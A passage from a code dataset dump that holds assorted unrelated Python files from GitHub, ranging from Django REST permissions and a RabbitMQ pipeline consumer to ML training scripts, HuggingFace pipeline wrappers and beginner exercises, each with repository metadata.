source_audios.shape[0]
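\n\n# Added sketch (not in the original script): read one group back to sanity-check the layout.\nwith h5py.File(hdf_file, \"r\") as f:\n    print(f.attrs[\"sr\"], f[\"0\"][\"inputs\"].shape, f[\"0\"][\"targets\"].shape)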
\n","repo_name":"nicoloddo/WaveDenoiserNN","sub_path":"data_to_hdf.py","file_name":"data_to_hdf.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14447695864","text":"from rest_framework.permissions import BasePermission, SAFE_METHODS\n\n\nclass IsOwnerOrStaffOrReadOnly(BasePermission):\n    # Check object-level permission:\n    # make sure the request comes from the authenticated owner of the book\n    # or from authorized company staff\n    def has_object_permission(self, request, view, obj):\n        return bool(\n            request.method in SAFE_METHODS or\n            request.user and\n            request.user.is_authenticated and\n            (\n                obj.owner == request.user or\n                request.user.is_staff\n            )\n        )\n","repo_name":"Ulftar/books","sub_path":"store/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16289046587","text":"\r\nfrom django.urls import path\r\nfrom .views import *\r\n\r\n\r\nurlpatterns = [\r\n    path('',ListTodoAPIView.as_view(),name='todo'),\r\n    path('<int:pk>/detail',TodoDetailAPIView.as_view(),name='detail'),\r\n    path('create',CreateTodoAPIView.as_view(),name='create'),\r\n    path('<int:pk>/update',UpdateTodoAPIView.as_view(),name='update'),\r\n    path('<int:pk>/delete',DeleteTodoAPIView.as_view(),name='delete'),\r\n    # path('/',Redirector.as_view(),name='redirector'),\r\n]","repo_name":"Shabana-12/URL_SHORTNER_DJANGO_REST_API","sub_path":"shortnerapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37555998288","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Graph analysis on test routes\n\"\"\"\n__license__ = None\n\nimport argparse\nimport logging\nimport sys\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom stanalysis.graphbuilder import build_graph\nimport stanalysis.graphtools as graphtools\n\nlog = logging.getLogger(__name__)\n\n\ndef main(args):\n    parser = argparse.ArgumentParser()\n    parser.add_argument('output', metavar='graph.pickle',\n                        help='Output graph file')\n    parser.add_argument(\n        '--connection',\n        default='postgresql://osm:osm@localhost/osrm',\n        help='Postgres connection string. 
Default %(default)s'\n )\n parser.add_argument('--prune', action='store_true',\n help='Collapse redundant edges, prune tails')\n\n parser.add_argument('--verbose', action='store_true',\n help='Increase logging level')\n\n args = parser.parse_args()\n\n logging.basicConfig(\n level=logging.INFO if args.verbose else logging.WARNING)\n\n log.info(\"Creating DB engine\")\n engine = create_engine(args.connection, echo=False)\n\n log.info(\"Creating DB session\")\n Session = sessionmaker(bind=engine)\n session = Session()\n\n g = build_graph(session)\n\n if args.prune:\n log.info(\"Collapsing unidirectional strings\")\n pruned = graphtools.collapse_degree_2_vtxs(g)\n log.info(\"Removed %i thru-nodes\", pruned)\n log.info(\"Collapsing bidirectional strings\")\n pruned = graphtools.collapse_bidirectional_streets(g)\n log.info(\"Removed %i thru-nodes\", pruned)\n log.info(\"Snipping tails\")\n snipped = graphtools.delete_degree_1_vtxs(g)\n log.info(\"Removed %i tails\", snipped)\n loners = graphtools.delete_degree_0_vtxs(g)\n log.info(\"Removed %i loner-nodes (should be zero)\", loners)\n redundancies = graphtools.identify_rendudant_nodes(g)\n log.info(\"Marked %i nodes as redundant\", redundancies)\n\n log.info(\"Saving graph to %s\", args.output)\n g.save(args.output)\n\nif __name__ == \"__main__\": # pragma: nocover\n sys.exit(main(sys.argv))\n","repo_name":"ekfriis/scientraffic-analysis","sub_path":"graphroutes.py","file_name":"graphroutes.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15366710085","text":"#!/usr/bin/env python\n\nfrom os import environ\nfrom datetime import datetime\nimport pika\nfrom pipeline.shared.rabbitmq_conn import get_rabbitmq_conn\nfrom dronelogs.shared.db_conn import get_db_conn\nfrom dronelogs.shared.get_uuid_from_string import get_uuid\n\nSTEP_NAME = 'init'\n\ndef check_dependency(cursor, uuid):\n tablename = environ['PIPILE_NAME']\n query = f\"SELECT * FROM {tablename} \"\n query += \"WHERE uuid = %s;\"\n cursor.execute(query, (uuid,))\n return cursor.fetchone()\n\ndef insert_row(cursor, uuid, file_name):\n tablename = environ['PIPILE_NAME']\n values = (uuid, file_name, datetime.now())\n sql_str = f\"INSERT INTO {tablename} \"\n sql_str += \"(uuid, file_name, started_at) VALUES (%s, %s, %s)\"\n cursor.execute(sql_str, values)\n\ndef callback(ch, method, properties, body):\n file_name = body.decode(\"utf-8\")\n uuid = get_uuid(file_name)\n if isinstance(uuid, str):\n connection = get_db_conn()\n if connection:\n cursor = connection.cursor()\n dependency_met = check_dependency(cursor, uuid)\n if dependency_met is None:\n insert_row(cursor, uuid, file_name)\n connection.commit()\n cursor.close()\n connection.close()\n ch.queue_declare(queue='decrypt', durable=True)\n ch.basic_publish(\n exchange=environ['PIPILE_NAME'],\n routing_key=\"decrypt\",\n body=file_name,\n properties=pika.BasicProperties(delivery_mode=2)\n )\n ch.basic_ack(delivery_tag=method.delivery_tag)\n else:\n print(\"Failed\")\n ch.basic_nack(delivery_tag=method.delivery_tag, requeue=True)\n else:\n print(f\"Failed {file_name}\")\n ch.basic_nack(delivery_tag=method.delivery_tag, requeue=False)\n\ndef init():\n connection = get_rabbitmq_conn()\n channel = connection.channel()\n channel.exchange_declare(\n exchange=environ['PIPILE_NAME'],\n exchange_type='direct'\n )\n result = channel.queue_declare(queue='', exclusive=True)\n queue_name = result.method.queue\n channel.queue_bind(\n 
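exchange=environ['PIPILE_NAME'],  # bind this consumer's queue to the pipeline's direct exchange\n        queue=queue_name,\n        routing_key=STEP_NAME\n    )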
\n    prefetch = int(environ['CONSUMER_PRE_FETCH'])\n    channel.basic_qos(prefetch_count=prefetch)\n    channel.basic_consume(\n        queue=queue_name,\n        auto_ack=False,  # this is the default behaviour of acknowledgement;\n        # we need to send it ourselves, and we do it in the last line of the callback function\n        on_message_callback=callback\n    )\n    print(' [*] Waiting for messages. To exit press CTRL+C')\n    channel.start_consuming()\n\n\nif __name__ == \"__main__\":\n    try:\n        init()\n    except KeyboardInterrupt:\n        print('Bye!')\n","repo_name":"jpmolinamatute/airflow-rabbitmq-demo","sub_path":"pipeline/rabbitmq/init/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6408770739","text":"# Largest and smallest values\na = int(input('1° valor: '))\nb = int(input('2° valor: '))\nc = int(input('3° valor: '))\nmaior = a\nif b > a and b > c:\n    maior = b\nif c > a and c > b:\n    maior = c\n\nmenor = a\nif b < a and b < c:\n    menor = b\nif c < a and c < b:\n    menor = c\nprint(f'o maior número é {maior}')\nprint(f'o menor número é {menor}')\n","repo_name":"ranie2019/GuanabaraExercicios","sub_path":"33.py","file_name":"33.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23932487770","text":"from datetime import date\r\ntoday = date.today()\r\nformat_string = \"%d-%m-%Y\"\r\n\r\n\r\nclass Product_List(object):\r\n    def __init__(self, item_name, price, quantity, expiry_date):\r\n        self.__item_name = item_name\r\n        self.__price = price\r\n        self.__quantity = quantity\r\n        self.__expiry_date = expiry_date\r\n\r\n    def show_list(self):\r\n        print(\"Item:\", self.__item_name, \"Price:\", (str(self.__price))+(\"€\"), \"Available_quantity:\", self.__quantity)\r\n\r\n    def expired_product(self):\r\n        if self.__expiry_date == today:\r\n            return \"The item\", self.__item_name, \"has expired.\"\r\n\r\n    def remove_item(self, amount):\r\n        if self.__quantity > 0:\r\n            self.__quantity = self.__quantity - amount\r\n            return self.__quantity\r\n\r\n    def add_item(self, amount):\r\n        self.__quantity = self.__quantity + amount\r\n        return self.__quantity\r\n\r\n    def add_price(self, value):\r\n        self.__price = self.__price + value\r\n        return (str(self.__price))+(\"€\")\r\n\r\n    def reduce_price(self, value):\r\n        self.__price = self.__price - value\r\n        return (str(self.__price))+(\"€\")\r\n\r\n    def order_required(self):\r\n        if self.__quantity < 10:\r\n            return \"Warning! The stock for \", self.__item_name, \"is low\"
\r\n\r\n\r\nclass Customer(object):\r\n    def __init__(self, name):\r\n        self.name = name\r\n        self.total = 0\r\n        self.items = {}\r\n        print(\"Welcome\", name)\r\n\r\n    def add_item(self, item_name, quantity, price):\r\n        self.total += price * quantity\r\n        self.items.update({item_name: quantity})\r\n        return \"The item\", item_name, \"has been added to your cart\"\r\n\r\n    def remove_item(self, item_name, quantity, price):\r\n        if item_name in self.items:\r\n            if quantity < self.items[item_name] and quantity > 0:\r\n                self.items[item_name] -= quantity\r\n                self.total -= price * quantity\r\n            elif quantity >= self.items[item_name]:\r\n                self.total -= price * self.items[item_name]\r\n                del self.items[item_name]\r\n            return \"The item\", item_name, \"has been removed from your cart\"\r\n\r\n    def show_customer_cart(self):\r\n        return \"Selected products are:\", (\"Item/Quantity\")+(str(self.items)), \"Total_cost =\", str(self.total)+(\"€\")\r\n\r\n    def checkout(self, amount_paid):\r\n        if amount_paid > self.total:\r\n            print(\"You paid:\", str(amount_paid))\r\n            return \"Thanks for shopping with us, your balance is:\", (str(amount_paid - self.total))+(\"€\"), \"Have a nice Day!\"\r\n\r\n        elif amount_paid == self.total:\r\n            return \"Balance = 0€, Thanks for shopping with us, Have a nice Day!\"\r\n\r\n\r\n\r\nproduct1 = Product_List(\"bread\", 2, 7, today)\r\nproduct1.remove_item(4)\r\nproduct1.add_price(0.30)\r\nprint(product1.show_list())\r\nprint(product1.expired_product())\r\nprint(product1.order_required())\r\n\r\n\r\nproduct2 = Product_List(\"Milk\", 1, 12, date(2021, 10, 12))  # a date object; the bare 12-10-2021 would be integer arithmetic\r\nproduct2.add_item(20)\r\nprint(product2.show_list())\r\n\r\nguest1 = Customer(\"Andrew\")\r\nguest1.add_item(\"Milk\", 4, 2.00)\r\nguest1.add_item(\"Butter\", 1, 2.50)\r\nprint(guest1.add_item(\"Oranges\", 2, 2.00))\r\nprint(guest1.remove_item(\"Milk\", 1, 2.00))\r\nprint(guest1.show_customer_cart())\r\nprint(guest1.checkout(12.5))\r\n\r\n","repo_name":"kalyanishanmugam/shopping_website","sub_path":"Shopping_Cart_3.py","file_name":"Shopping_Cart_3.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15982494191","text":"import os\nimport time\nimport torch\nfrom torch.optim import AdamW\nfrom fastNLP import TorchWarmupCallback, FitlogCallback, CheckpointCallback, LoadBestModelCallback, TorchDataLoader\nfrom fastNLP import RandomSampler, SequentialSampler, prepare_torch_dataloader\nfrom fastNLP import cache_results, Trainer, Evaluator, Event, print\n\nfrom transformers import AutoTokenizer, AutoModel\n\nfrom parse import parse_args\nfrom pipe import EBDataPipe\nfrom model import EBRLModel\nfrom utils import EBRLMetric, ScheduledSamplingCallback, EBPredMetric, EBPredMetricWithPara\n\nimport logging\nimport fitlog\n\n\ndef do_train():\n    # 1. 
logs and args\n logging.basicConfig(level=logging.INFO)\n logging.info('Start logging ଘ(੭ˊᵕˋ)੭')\n args = parse_args()\n # fitlog.debug()\n fitlog.commit(__file__)\n fitlog.set_log_dir('logs')\n fitlog.add_hyper(args)\n fitlog.add_hyper_in_file(__file__)\n if args.seed != 0:\n fitlog.set_rng_seed(args.seed)\n print(\"Set random seed as\", args.seed)\n else:\n fitlog.set_rng_seed()\n\n save_dir = args.model_type\n if args.learning_rate != 1e-5:\n save_dir += '_lr' + str(args.learning_rate)\n if args.dropout != 0.1:\n save_dir += '_drop' + str(args.dropout)\n if args.K != 2:\n save_dir += '_K' + str(args.K)\n if args.gradient_accumulation_steps != 1:\n save_dir += '_acc' + str(args.gradient_accumulation_steps)\n if args.discount != 0.99:\n save_dir += '_dis' + str(args.discount)\n if args.warmup_proportion != 0:\n save_dir += '_w' + str(args.warmup_proportion) + '_' + str(args.schedule)[0]\n if args.seed != 42:\n save_dir += '_rnd' + str(args.seed)\n save_dir += '_ep' + str(args.num_epochs)\n save_dir = os.path.join('outputs', args.model_save_dir, save_dir)\n\n if not os.path.exists(save_dir):\n os.makedirs(save_dir, exist_ok=True)\n\n paths = {'train': os.path.join(args.data_dir, 'train.jsonl'),\n 'dev': os.path.join(args.data_dir, 'dev.jsonl'),\n 'test': os.path.join(args.data_dir, 'test.jsonl')}\n\n # 2. data\n tokenizer = AutoTokenizer.from_pretrained(args.policy_model_config, local_files_only=True)\n data_save_path = os.path.join(args.data_dir, args.data_save_path)\n print(\"data_save_path:\", data_save_path)\n\n @cache_results(data_save_path, _refresh=args.refresh_data)\n def get_data(test=False):\n pipe = EBDataPipe(tokenizer, args)\n _data_bundle = pipe.process_from_file(paths, test)\n return _data_bundle\n\n train_data_bundle = get_data(test=False)\n # print(train_data_bundle)\n train_data = train_data_bundle.get_dataset('train')\n\n eval_data_bundle = get_data(_cache_fp=os.path.join(args.data_dir, args.test_data), test=True)\n logging.info(\"Using [Eval] data to test.\")\n dev_data = eval_data_bundle.get_dataset('dev')\n test_data = eval_data_bundle.get_dataset('test')\n\n train_dl = prepare_torch_dataloader(train_data, batch_size=args.train_batch_size, sampler=RandomSampler(train_data))\n dev_dl = prepare_torch_dataloader(dev_data, batch_size=args.eval_batch_size, sampler=SequentialSampler(dev_data))\n test_dl = prepare_torch_dataloader(test_data, batch_size=args.eval_batch_size, sampler=SequentialSampler(test_data))\n\n # 3. model\n model = EBRLModel(args)\n\n if len(args.device) == 1:\n device = int(args.device[0])\n else:\n device = [int(d) for d in args.device]\n\n if args.do_train:\n if args.pred_para:\n pred_save_dir = os.path.join(save_dir, 'pred_para.tsv')\n else:\n pred_save_dir = os.path.join(save_dir, 'pred.tsv')\n\n if args.policy_model_path is not None:\n warmup_model_dict = torch.load(args.policy_model_path)\n model_dict = model.state_dict()\n\n # 1) filter out unnecessary keys\n recover_dict = {k: v for k, v in warmup_model_dict.items() if k in model_dict}\n # 2) overwrite entries in the existing state dict\n model_dict.update(recover_dict)\n # 3) load the new state dict\n model.load_state_dict(model_dict)\n logging.info('Loaded parameters from warming up model at ' + str(args.policy_model_path) + '.')\n else:\n pretrained_model = AutoModel.from_pretrained(args.policy_model_config)\n model = EBRLModel(args, ptm=pretrained_model)\n print(\"Use pretrained model parameter without warmup training.\")\n\n # 4. 
loss, optimizer, metric\n # loss = LossInForward()\n\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": args.weight_decay},\n {\"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0}]\n optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate)\n\n metric = {\"rlet\": EBRLMetric()}\n\n # 5. callbacks and trainer\n\n model_save_dir = os.path.join(save_dir, \"checkpoint\")\n callbacks = [TorchWarmupCallback(warmup=args.warmup_proportion, schedule=args.schedule),\n FitlogCallback(log_loss_every=200),\n LoadBestModelCallback(save_folder=model_save_dir, only_state_dict=True),\n CheckpointCallback(folder=model_save_dir, topk=2, monitor='F1#rlet#test',\n only_state_dict=True),\n\n ScheduledSamplingCallback(args.sampling)]\n logging.info('Start training ଘ( ˊ•̥▵•)੭₎₎')\n\n # result_save_dir = os.path.join(save_dir, args.result_dir)\n\n result_save_dir = os.path.join(save_dir, args.result_dir)\n if not os.path.exists(result_save_dir):\n os.makedirs(result_save_dir, exist_ok=True)\n\n @Trainer.on(Event.on_before_backward(every=400))\n def print_loss(trainer, outputs):\n print(f\"train_loss: {outputs['loss']}\")\n\n if args.evaluate_before_train:\n t_begin = time.time()\n evaluator = Evaluator(model, driver='torch', device=device, dataloaders=test_dl,\n metrics=metric,\n progress_bar='rich',\n kwargs={\"use_dist_sampler\": False},\n fp16=args.fp16\n )\n\n evaluator.run()\n t_end = time.time()\n print(f'Finished evaluating on TEST {len(test_data)} examples.')\n print(f'Test (before train) duration: {t_end - t_begin} sec.')\n\n t_train_begin = time.time()\n\n trainer = Trainer(model=model,\n train_dataloader=train_dl,\n optimizers=optimizer,\n driver='torch',\n device=device,\n evaluate_dataloaders={\"dev\": dev_dl, \"test\": test_dl},\n metrics=metric,\n callbacks=callbacks,\n output_mapping=None,\n n_epochs=args.num_epochs,\n evaluate_every=args.eval_step,\n accumulation_steps=args.gradient_accumulation_steps,\n fp16=args.fp16,\n torch_kwargs={'ddp_kwargs': {'find_unused_parameters': True}},\n monitor='F1#rlet#test',\n # overfit_batches=300\n )\n\n trainer.run()\n t_train_end = time.time()\n logging.info(f'Training duration: {round((t_train_end - t_train_begin)/60, 4)} minutes, '\n f'i.e., {round((t_train_end - t_train_begin)/3600, 4)} hours.')\n else:\n # model.load_state_dict(torch.load(args.model_path).state_dict())\n model.load_state_dict(torch.load(args.policy_model_path))\n logging.info('[Eval] Loaded actor parameters from test model at ' + str(args.policy_model_path) + '.')\n\n pred_save_dir = os.path.split(args.policy_model_path)[0]\n \n if args.pred_para:\n pred_save_dir = os.path.join(pred_save_dir, 'pred_para.tsv')\n else:\n pred_save_dir = os.path.join(pred_save_dir, 'pred.tsv')\n logging.info('[Eval] Will save pred at ' + str(pred_save_dir) + '.')\n\n logging.info('Start testing ଘ(੭*ˊᵕˋ)੭* ੈ♡‧₊˚')\n\n if args.pred_para:\n if args.do_train:\n verbose = False\n else:\n verbose = True\n metrics = {\"rlet\": EBPredMetricWithPara(test=True, out_path=pred_save_dir, verbose=verbose,\n inter_cache_path=args.inter_cache_path, pred_para=args.pred_para)}\n else:\n metrics = {\"rlet\": EBPredMetric(test=True, out_path=pred_save_dir, verbose=False)}\n\n print(f\"Set k_test = {args.K_test} in evaluation.\")\n\n t_begin = time.time()\n evaluator = Evaluator(model, driver='torch', 
device=device, dataloaders=test_dl,\n                          metrics=metrics,\n                          progress_bar='rich',\n                          kwargs={\"use_dist_sampler\": False},\n                          fp16=args.fp16\n                          )\n\n    evaluator.run()\n    t_end = time.time()\n    print(f'Finished evaluating on TEST {len(test_data)} examples.')\n    print(f'Test duration: {t_end - t_begin} sec.')\n\n    fitlog.finish()\n\n\nif __name__ == \"__main__\":\n    do_train()\n","repo_name":"tengxiaoliu/RLET","sub_path":"src/rl/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9579,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"67"} +{"seq_id":"8645048437","text":"\"\"\"\n    author: ShilpaItnal23\n    \n    email: saishilpa723@gmail.com\n    \n\"\"\"\n\nimport os\nfrom src.utils.common import read_config\nfrom src.utils.data_mgmt import get_data\nfrom src.utils.model import create_model, save_model, save_plot\nimport argparse\nimport logging\nimport pandas as pd\nlogging_str = \"[%(asctime)s: %(levelname)s: %(module)s] %(message)s\"\nlog_dir = \"logs\"\nos.makedirs(log_dir, exist_ok=True)\nlogging.basicConfig(filename=os.path.join(log_dir, \"running_logs.log\"), level=logging.INFO, format=logging_str, filemode=\"a\")\n\n\n\ndef training(config_path):\n    config = read_config(config_path)\n    logging.info(f\"This reads data from the config file: {config}\")\n    validation_datasize = config[\"params\"][\"validation_datasize\"]\n    (X_train, y_train), (X_valid, y_valid), (X_test, y_test) = get_data(validation_datasize)\n    LOSS_FUNCTION = config[\"params\"][\"loss_function\"]\n    OPTIMIZER = config[\"params\"][\"optimizer\"]\n    METRICS = config[\"params\"][\"metrics\"]\n    NUM_CLASSES = config[\"params\"][\"num_classes\"]\n\n    model = create_model(LOSS_FUNCTION, OPTIMIZER, METRICS, NUM_CLASSES)\n\n    EPOCHS = config[\"params\"][\"epochs\"]\n    VALIDATION_SET = (X_valid, y_valid)\n\n    history = model.fit(X_train, y_train, epochs=EPOCHS,\n                        validation_data=VALIDATION_SET)\n\n    artifacts_dir = config[\"artifacts\"][\"artifacts_dir\"]\n    model_dir = config[\"artifacts\"][\"model_dir\"]\n    model_dir_path = os.path.join(artifacts_dir, model_dir)\n    os.makedirs(model_dir_path, exist_ok=True)\n    model_name = config[\"artifacts\"][\"model_name\"]\n    save_model(model, model_name, model_dir_path)\n\n    plot_dir = config[\"artifacts\"][\"plot_dir\"]\n    plot_dir_path = os.path.join(artifacts_dir, plot_dir)\n    os.makedirs(plot_dir_path, exist_ok=True)\n    plot_name = config[\"artifacts\"][\"plot_name\"]\n    loss_acc = history.history\n    save_plot(loss_acc, plot_name, plot_dir_path)\n\nif __name__ == '__main__':\n    args = argparse.ArgumentParser()\n\n    args.add_argument(\"--config\", \"-c\", default=\"config.yaml\")\n\n    parsed_args = args.parse_args()\n    try:\n        logging.info(\">>>>> starting ANN training >>>>>\")\n        training(config_path=parsed_args.config)\n        logging.info(\"<<<<< ANN training done successfully <<<<<\\n\")\n    except Exception as e:\n        logging.exception(e)\n        raise e","repo_name":"ShilpaItnal23/ANN-implementation-demo","sub_path":"src/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72615060054","text":"n, k = map(int, input().split())\n\nif k == 1:\n    for i in range(1, n + 1):\n        print(i, end=' ')\nelif k > n / 2:\n    print(\"Impossible\")\nelse:\n    even = (n // 2) + 1\n    odd = 1\n\n    for i in range(0, n // 2):\n        print(even, odd, end=' ')\n        even += 1\n        odd += 1\n    if n % 2 != 0:
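\n        # when n is odd, the unpaired middle number is printed on its own\n        print(n)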
\n","repo_name":"HamidMolareza/QueraProblems","sub_path":"Solutions/4068/python3/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"67"} +{"seq_id":"74197123733","text":"#! /usr/bin/env python\n\nimport os\nfrom textwrap import dedent\nfrom .common import render_output_text, is_gpu_available\n\n# this is nasty, but we have to make sure the HF model cache directory is\n# created before we load in the transformers library\ndef _setup():\n    # make sure that the models cache is set up\n    if 'TRANSFORMERS_CACHE' not in os.environ:\n        if not os.path.exists('./model_cache/hf'):\n            os.makedirs('./model_cache/hf')\n\n        # set the environment variable\n        os.environ['TRANSFORMERS_CACHE'] = os.path.abspath('./model_cache/hf')\n\n_setup()\n\n\nfrom transformers import pipeline, set_seed # type: ignore\nfrom transformers.utils.logging import set_verbosity_error\n\nfrom typing import List, Any, Optional\nfrom IPython.display import Markdown, display\n\n\n# silence errors from deep within Transformers\nset_verbosity_error()\n\n\ndef _seed_if_necessary(seed: Optional[int]):\n    '''\n    Quick function that sets the seed if it's passed. If not provided,\n    no seed will be explicitly set\n\n    :param seed: Seed to set or None or -1\n    '''\n    if seed is not None and seed != -1:\n        set_seed(seed)\n\n\ndef _get_pipeline_device(accelerate: bool = True):\n    '''\n    Determine CUDA device to use.\n\n    :param accelerate: (optional) Whether to use acceleration if it is available. Default True\n    :return: The pipeline device argument\n    '''\n    if accelerate and is_gpu_available():\n        return 0\n\n    return -1\n\n\ndef summarization(\n        text: str,\n        model: str = 'facebook/bart-large-cnn',\n        max_length: int = 130,\n        min_length: int = 30,\n        do_sample: bool = False,\n        accelerate: bool = True,\n        seed: Optional[int] = None,\n        render: bool = True\n    ):\n    '''\n    Summarize text from a prompt.\n\n    :param text: The text to summarize.\n    :param model: (optional) The model to use for summarization (default `facebook/bart-large-cnn`)\n    :param max_length: (optional) The maximum length of the summary. (default 130)\n    :param min_length: (optional) The minimum length of the summary. (default 30)\n    :param do_sample: (optional) Whether to subsample input (default False)\n    :param accelerate: (optional) Whether to use GPU acceleration (if available). Default True\n    :param seed: (optional) Seed value for reproducible pipeline runs.\n    :param render: (optional) Automatically render results for an ipython notebook \n                   if one is detected. 
Default True\n :return: A summarization of the original text.\n '''\n _seed_if_necessary(seed)\n\n device = _get_pipeline_device(accelerate=accelerate)\n pipe = pipeline(task='summarization', model=model, device=device)\n\n results = pipe(\n text,\n max_length=max_length,\n min_length=min_length,\n do_sample=do_sample\n )\n\n # convert results to a list of strings\n results = [r['summary_text'] for r in results]\n\n # skip render attempt if not requested\n if not render:\n return results\n\n return render_output_text(results)\n\n\ndef text_generation(\n prompt: str, \n max_length: int = 200,\n num_return_sequences: int = 3,\n model: str ='small',\n seed: Optional[int] =None,\n accelerate: bool = True,\n render: bool = True\n ):\n '''\n Generate text from a prompt.\n\n Options for model are:\n - 'small', 'medium', 'large' (mapping to distilgpt2, gpt2, and gpt-2-large)\n - any other text model on HF\n\n Some models to try:\n - EleutherAI/gpt-j-6b\n - facebook/opt-1.3b\n\n :param prompt: Text to prompt the pipeline with.\n :param model: (optional) Model to use. Default 'small'.\n :param max_length: (optional) Length of text to generate. Default 200.\n :param num_return_sequences: (optional) Number of different responses to make. Default 3.\n :param accelerate: (optional) Whether to use GPU acceleration (if available). Default True\n :param seed: (optional) Seed value for reproducible pipeline runs.\n :param render: (optional) Automatically render results for an ipython notebook \n if one is detected. Default True\n\n :returns: A list of text generated by the model.\n '''\n\n _seed_if_necessary(seed)\n\n if model in ['small', 'medium', 'large']:\n mapping = {\n 'small': 'distilgpt2',\n 'medium': 'gpt2',\n 'large': 'gpt2-large'\n }\n model = mapping[model]\n\n\n device = _get_pipeline_device(accelerate=accelerate)\n pipe = pipeline(task='text-generation', model=model, device=device)\n\n results = pipe(\n prompt,\n max_length=max_length,\n num_return_sequences=num_return_sequences\n )\n\n # convert results to a list of strings\n results = [r['generated_text'] for r in results]\n\n # skip render attempt if not requested\n if not render:\n return results\n\n return render_output_text(results)\n\n\n\ndef sentiment_analysis(\n text: str,\n model: str = 'distilbert-base-uncased-finetuned-sst-2-english',\n accelerate: bool = True,\n seed: Optional[int] = None,\n render: bool =True\n ):\n '''\n Analyze the sentiment of a particular piece of text.\n\n :param text: The text to analyze.\n :param model: (optional) The model to use for analysis. (default 'distilbert-base-uncased-finetuned-sst-2-english')\n :param accelerate: (optional) Whether to use GPU acceleration (if available). Default True\n :param seed: (optional) Seed value for reproducible pipeline runs.\n :param render: (optional) Automatically render results for an ipython notebook \n if one is detected. 
Default True\n    :return: The most likely sentiment of the text.\n    '''\n    _seed_if_necessary(seed)\n\n    device = _get_pipeline_device(accelerate=accelerate)\n    pipe = pipeline(task='sentiment-analysis', model=model, device=device)\n\n    sentiment = pipe(text)[0]\n\n    if not render:\n        return sentiment\n\n    color = 'red' if sentiment['label'] == 'NEGATIVE' else 'green'\n    return display(Markdown(f'<span style=\"color:{color}\">{sentiment[\"label\"]}</span> (score: {sentiment[\"score\"]*100}%)'))\n\n\ndef mask_filling(\n        text: str,\n        model: str = 'bert-base-uncased',\n        accelerate: bool = True,\n        seed: Optional[int] = None,\n        render: bool = True\n    ):\n    '''\n    Guess words that fill a specific slot in some text. The default mask token is [MASK].\n\n    :param text: The text to fill, with the mask token in it.\n    :param model: (optional) The model to use. (default 'bert-base-uncased')\n    :param accelerate: (optional) Whether to use GPU acceleration (if available). Default True\n    :param seed: (optional) Seed value for reproducible pipeline runs.\n    :param render: (optional) Automatically render results for an ipython notebook \n                   if one is detected. Default True\n    :return: A string with the mask filled in.\n    '''\n    _seed_if_necessary(seed)\n\n    device = _get_pipeline_device(accelerate=accelerate)\n    pipe = pipeline(task='fill-mask', model=model, device=device)\n\n    masks = pipe(text)\n\n    if not render:\n        return masks\n\n    # helper to render a string as bold\n    def render_mask_result(i, obj):\n        bolded = obj['sequence'].replace(obj['token_str'], f'**{obj[\"token_str\"]}**')\n\n        return f'Sample {i+1} ({100*obj[\"score\"]:.2f}%)\\n\\n> {bolded}'\n\n    # render each item with a sequence number\n    masks = '\\n\\n'.join([render_mask_result(i, obj) for i, obj in enumerate(masks)])\n\n    return display(Markdown(masks))\n\n\ndef question_answering(\n        question: str,\n        context: str,\n        model: str = 'deepset/roberta-base-squad2',\n        accelerate: bool = True,\n        seed: Optional[int] = None,\n        render: bool = True\n    ):\n    '''\n    Answer a question about some given context.\n\n    :param question: The question to answer from the data.\n    :param context: The context from which to draw the answer.\n    :param model: (optional) The model to use. (default 'deepset/roberta-base-squad2')\n    :param accelerate: (optional) Whether to use GPU acceleration (if available). Default True\n    :param seed: (optional) Seed value for reproducible pipeline runs.\n    :param render: (optional) Automatically render results for an ipython notebook \n                   if one is detected. 
Default True\n :return: \n :rtype: \n '''\n _seed_if_necessary(seed)\n\n device = _get_pipeline_device(accelerate=accelerate)\n pipe = pipeline(task='question-answering', model=model, device=device)\n\n answer = pipe({\n 'question': question,\n 'context': context\n })\n\n if not render:\n return answer\n\n return display(Markdown(dedent(f'''\\\n Answer: **{answer['answer']}**\n\n Score: `{answer['score']}` \n Position: {answer['start']} to {answer['end']}\n ''')))\n\n","repo_name":"pkage/ai-storytelling-backstage","sub_path":"code/aist/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":8882,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"39344146203","text":"import gym\nfrom meta_critics.running_spec import RunningSpec, RunningSpecError\nfrom meta_critics.app_globals import get_running_mode, SpecTypes\nfrom meta_critics.envs.bandits.bandit_bernoulli_env import *\n\nenv = gym.make('Bandit-K5-v0', k=10)\n\nobservation, info = env.reset(seed=42)\nprint(observation)\n\nfor _ in range(1000):\n action = 